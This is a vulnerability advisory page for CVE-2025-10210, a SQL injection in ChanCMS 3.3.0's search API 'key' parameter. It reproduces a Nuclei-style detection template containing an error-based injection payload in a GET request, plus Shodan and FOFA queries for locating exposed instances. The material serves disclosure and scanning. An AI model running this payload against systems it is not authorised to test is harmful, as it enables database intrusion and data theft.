漏洞描述
yanyutao0402 ChanCMS = 3.3.0 contains a SQL injection caused by manipulation of the \"key\" argument in app/modules/api/service/Api.js Search function, letting remote attackers execute arbitrary SQL commands, exploit requires crafted request.
CVE-2025-10210: ChanCMS <= 3.3.0 - SQL Injection
PoC代码[已公开]
id: CVE-2025-10210
info:
name: ChanCMS <= 3.3.0 - SQL Injection
author: Yu_Bao
severity: medium
description: |
yanyutao0402 ChanCMS = 3.3.0 contains a SQL injection caused by manipulation of the \"key\" argument in app/modules/api/service/Api.js Search function, letting remote attackers execute arbitrary SQL commands, exploit requires crafted request.
impact: |
Remote attackers can execute arbitrary SQL commands, potentially leading to data theft or database compromise.
remediation: |
Update to the latest version.
reference:
- https://gitee.com/yanyutao0402/ChanCMS
- https://vuldb.com/?id.323483
- https://github.com/August829/Yu/blob/main/58ead8e7e08bfb0e5.md
- https://nvd.nist.gov/vuln/detail/CVE-2025-10210
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
cvss-score: 6.3
cve-id: CVE-2025-10210
epss-score: 0.02541
epss-percentile: 0.84998
cwe-id: CWE-89
metadata:
verified: true
max-request: 1
shodan-query: http.html:"ChanCMS"
fofa-query: body="ChanCMS"
tags: cve,cve2025,chancms,sqli
variables:
rstr: "{{md5(rand_base(6))}}"
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/search?key=%27%20and%20extractvalue(1,concat(0x7e,%27{{rstr}}%27,0x7e))--%20a"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{rstr}}"
- "XPATH syntax"
condition: and
- type: status
status:
- 200
- 500
# digest: 4b0a00483046022100c30ca2da8d49ce22f31e744dcd791220c87af0c73f54788542c5454abc47647a02210086ce6d828407c9ba19bbae37ef6af5419f15e48c4c81d9e6b9f12b4d1aa60933:922c64590222798bb761d5b6d8e72950